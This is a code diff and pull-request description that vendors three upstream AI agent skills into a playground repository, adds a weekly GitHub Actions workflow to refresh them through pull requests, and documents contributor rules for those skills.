+        uses: peter-evans/create-pull-request@5f6978faf089d4d20b00c7766989d076bb2fc7f1 # v8.1.1
+        with:
+          commit-message: "chore(deps): update agent skills"
+          title: "chore(deps): update agent skills"
+          body: |
+            Weekly `gh skill update --all` run against `.agents/skills/`.
+
+            ```text
+            ${{ steps.update.outputs.updated-skills }}
+            ```
+
+            Skills are prompts that coding agents follow, so an upstream change
+            is a behaviour change: skim the diff before merging.
+          branch: deps/agent-skills-update
+          delete-branch: true

--- a/AGENTS.md
+++ b/AGENTS.md
@@ -69,6 +69,45 @@ known pitfalls, and conventions that are not repeated elsewhere in this document
 4. **Do not duplicate** skill content in this file — AGENTS.md provides the architectural
    overview; skills provide the deep domain knowledge.
 
+### Third-party skills
+
+Alongside the in-house skills, `.agents/skills/` vendors three upstream skills for tools this
+project is built with. They are installed with the GitHub CLI, which copies the skill into
+`.agents/skills/<name>/` (the directory GitHub Copilot, Codex, Cursor, Gemini CLI and most
+other agents read) and records the upstream repository, path and tree SHA in the `SKILL.md`
+frontmatter so the copy can be refreshed later (`gh skill add` is an alias of `gh skill install`):
+
+```bash
+gh skill add cloudflare/security-audit-skill security-audit --agent github-copilot
+ln -s ../../.agents/skills/security-audit .claude/skills/security-audit
+gh skill update --all    # refresh every vendored skill
+```
+
+| Skill | Read it before | Origin |
+|-------|----------------|--------|
+| `security-audit` | Hunting vulnerabilities or validating a security finding in application code: a multi-agent recon → hunt → validate → report pipeline that only reports exploitable issues | [`cloudflare/security-audit-skill`](https://github.com/cloudflare/security-audit-skill), MIT |
+| `github-actions-hardening` | Reviewing, hardening or writing any `.github/workflows/*.yml`: per-job `permissions:`, SHA-pinned third-party actions, `${{ }}` injection via `env:`, privileged triggers. Report-only by default; apply the edits when asked. Policy here: first-party `actions/*` stay on major tags kept current by Dependabot; pin third-party actions to a commit SHA with a version comment, as `update-agent-skills.yml` does | [`github/awesome-copilot`](https://github.com/github/awesome-copilot), MIT |
+| `playwright-cli` | Driving the running playground from the terminal with `npx playwright cli`: snapshot and click through the nested iframes, read console and network output, mock routes, or attach to a spec paused with `npx playwright test --debug=cli`. Not for authoring `tests/e2e/*.spec.mjs` (`e2e-playwright` stays authoritative there), and ignore its plan/generate test-generation flow | [`microsoft/playwright-cli`](https://github.com/microsoft/playwright-cli), Apache-2.0 |
+
+Rules for vendored skills:
+
+- **Keep them verbatim.** Never reformat or edit a vendored skill: local changes diverge from
+  upstream and `gh skill update` overwrites them. Fix it upstream and re-install. Provenance
+  lives in each `SKILL.md` frontmatter (`metadata.github-repo`, `github-path`,
+  `github-tree-sha`); in-house skills carry no such metadata and the updater skips them.
+- **One copy, symlinked for Claude Code.** Claude Code only scans `.claude/skills/`, so every
+  skill — in-house or vendored — is exposed there as a symlink to its `.agents/skills/`
+  directory. Do not copy a `SKILL.md`; link it.
+- **Updates arrive as pull requests.** `.github/workflows/update-agent-skills.yml` runs
+  `gh skill update --all` every Monday and opens a PR when an upstream skill changed. Skills
+  are prompts, so review that diff as a behaviour change.
+- **Project rules win.** Vendored skills describe their tool in general; where one disagrees
+  with this file or an in-house skill, the repository's conventions apply.
+- **No WordPress Playground skills, deliberately.** `WordPress/agent-skills` `blueprint` and
+  `wp-playground` describe WordPress Blueprints, whose schema shares step names with ours
+  (`login`, `writeFile`, `unzip`, …) but not their shapes; an agent following them would
+  rewrite our blueprints into WordPress ones. `blueprint-provisioning` is the authority here.
+
 ## Build System
 
 This project uses npm, esbuild, and a small Makefile workflow.

--- a/docs/maintainers/contributing.md
+++ b/docs/maintainers/contributing.md
@@ -163,3 +163,9 @@ Significant technical decisions must be recorded as
 `AGENTS.md` at the repository root is the authoritative guide for AI coding agents and the
 specialist agent skills under `.agents/skills/`. Consult it for domain-deep conventions,
 checklists, and known pitfalls before working in an unfamiliar area.
+
+Third-party skills (for example Cloudflare's `security-audit`) are vendored into that same
+directory with the GitHub CLI (`gh skill add`) and refreshed by the `update-agent-skills`
+workflow, which runs `gh skill update --all` weekly and opens a pull request when upstream
+changed. Claude Code discovers every skill through the symlinks under `.claude/skills/`.
+Never edit a vendored skill in place; the Skills section in `AGENTS.md` has the details.

--- a/docs/maintainers/internal-notes.md
+++ b/docs/maintainers/internal-notes.md
@@ -13,7 +13,9 @@ The authoritative guide for working in this codebase (human or AI) is
 at the repository root. Deep, per-domain references live in the skill files under
 [`.agents/skills/`](https://github.com/ateeducacion/moodle-playground/tree/main/.agents/skills)
 (Moodle internals, WP Playground & php-wasm, WASM & browser runtime, blueprint
-provisioning, unit testing, and E2E testing).
+provisioning, unit testing, and E2E testing). The same directory also holds
+third-party skills installed with `gh skill add` and kept current by the
+`update-agent-skills` workflow; `AGENTS.md` lists them with their origin.
 
 ## Architecture Decision Records and Software Design Documents
 

--- a/scripts/build-cloudflare-pages.sh
+++ b/scripts/build-cloudflare-pages.sh
@@ -11,6 +11,8 @@ mkdir -p _site/docs
 rsync -a ./ ./_site/ \
   --exclude ".git/" \
   --exclude ".github/" \
+  --exclude ".agents/" \
+  --exclude ".claude/" \
   --exclude ".venv/" \
   --exclude ".cache/" \
   --exclude "_site/" \


### PR DESCRIPTION
## Summary

Vendors three upstream agent skills with the GitHub CLI, exposes every skill to Claude Code, and adds a weekly workflow that keeps the vendored copies current through pull requests. Same shape as the `wp-decker` setup, with the improvements noted below. The sibling playgrounds get the same change (links at the end).

## What is installed

| Skill | Source | Why |
|---|---|---|
| `security-audit` | [cloudflare/security-audit-skill](https://github.com/cloudflare/security-audit-skill) (MIT) | Multi-agent recon → hunt → validate → report pipeline that only reports exploitable issues in application code. |
| `github-actions-hardening` | [github/awesome-copilot](https://github.com/github/awesome-copilot) (MIT) | The Actions threat model linters miss: per-job permissions, SHA pinning, `${{ }}` injection, privileged triggers. Every workflow in this repo has at least one of the gaps it checks. |
| `playwright-cli` | [microsoft/playwright-cli](https://github.com/microsoft/playwright-cli) (Apache-2.0, release v0.1.19) | Drives the running playground from the terminal with `npx playwright cli`, including the nested shell → remote → playground iframes; verified against the pinned `@playwright/test`. Complements the in-house `e2e-playwright`, which stays authoritative for the specs. |

Installed with `gh skill add <repo> <skill> --agent github-copilot`, so each `SKILL.md` carries the upstream repo, path and tree SHA that `gh skill update` needs.

### Evaluated and rejected

A parallel research pass looked at 119 candidates across WordPress Playground, Moodle, browser/WASM/Playwright, CI and Cloudflare, security, and the sibling applications; seven reached the shortlist and were re-read independently. Notable rejections:

- **`WordPress/agent-skills` `blueprint` and `wp-playground`**: they describe WordPress Blueprints, which share step names with ours (`login`, `writeFile`, `unzip`) but not their shapes, and tell the agent to strip unknown keys. Installing them would corrupt our blueprints. AGENTS.md now records this so nobody re-adds them.
- **`WordPress/wordpress-playground` `debug-php-wasm-main-module`**: good material, but most of it assumes recompiling php-wasm with the upstream nx/Docker toolchain. Its error-string table is worth folding into `wasm-browser-runtime` later.
- **Moodle skills (`wkhaliddev/moodle-superpowers`, `SaadRahman01/claude-moodle-dev`)**: plugin-developer cheat sheets. The coding-style one contradicts moodle-cs on variable naming and would inject GPL headers into blueprint CLI snippets. They belong in the ateeducacion/moodle fork checkout where the MDL-88218 patches are authored, if anywhere.
- **`cloudflare/skills` `workers-best-practices` and `wrangler`**: the proxy worker already follows the applicable rules, and the repo-root `wrangler.toml` is Pages config that those skills would misread.
- **`nextcloud/nextcloud-skills` `nextcloud-php-app`**: canonical, but for authoring apps (Docker runbook, 470 KB); the playgrounds only install them.

## Layout

- One copy of every skill in `.agents/skills/` (read by Copilot, Codex, Cursor, Gemini CLI and most other agents). Claude Code only scans `.claude/skills/`, and its docs guarantee symlink support with de-duplication, so `.claude/skills/<name>` is a symlink, for the in-house skills too. No duplicated copies to keep in sync, unlike decker. Verified locally that `gh skill update --force --all` rewrites the target and leaves the symlinks alone.
- `.agents/` and `.claude/` are now excluded from the site rsync in `ci.yml` and `scripts/build-cloudflare-pages.sh`. The whole skills tree was being deployed to Pages, and the new symlinks would have followed it.

## Weekly updater

`.github/workflows/update-agent-skills.yml` (Mondays 06:23 UTC, plus `workflow_dispatch`) runs `devantler-tech/actions/update-agent-skills` on `.agents/skills` and opens `chore(deps): update agent skills` through `peter-evans/create-pull-request` when a `SKILL.md` changed.

Compared with the decker version: `permissions: {}` at workflow level with the write scopes on the job, a concurrency group, both third-party actions pinned to commit SHAs with version comments (Dependabot bumps them), `delete-branch: true`, and a header explaining why the PR carries no CI run (PRs from `GITHUB_TOKEN` do not trigger `ci.yml`, and nothing in the build reads the skills). In-house skills have no upstream metadata and are skipped with a notice. Tag-resolved skills such as `playwright-cli` follow new releases (installing v0.1.18 made the CLI offer the v0.1.19 update); only `--pin` freezes one.

## Docs

`AGENTS.md` gains a "Third-party skills" section: install and update commands, the table above, and the rules (verbatim, symlinked, updates via PR, project rules win, no WordPress Playground skills). `docs/maintainers/contributing.md` and `internal-notes.md` mention the vendored skills. No ADR: the existing records cover runtime and product architecture, and this is contributor tooling documented in AGENTS.md.

## Verification

- `gh skill list` shows the three skills at project scope with their source repos; `gh skill update --all --dry-run --dir .agents/skills` reports everything up to date.
- Both workflows parse as YAML, `bash -n` passes on the build script, `make lint` is clean apart from pre-existing warnings.

## Follow-ups considered, not done here

- Fold the correct moodle-cs rules and the php-wasm crash error-string table into the in-house skills.
- SHA-pin `shivammathur/setup-php` in `ci.yml` and move the `pages`, `id-token` and `pull-requests` write scopes from workflow to job level; `github-actions-hardening` will flag both.

## Sibling pull requests

- moodle-playground: https://github.com/ateeducacion/moodle-playground/pull/297
- omeka-s-playground: https://github.com/ateeducacion/omeka-s-playground/pull/143
- nextcloud-playground: https://github.com/ateeducacion/nextcloud-playground/pull/71
- facturascripts-playground: https://github.com/erseco/facturascripts-playground/pull/124
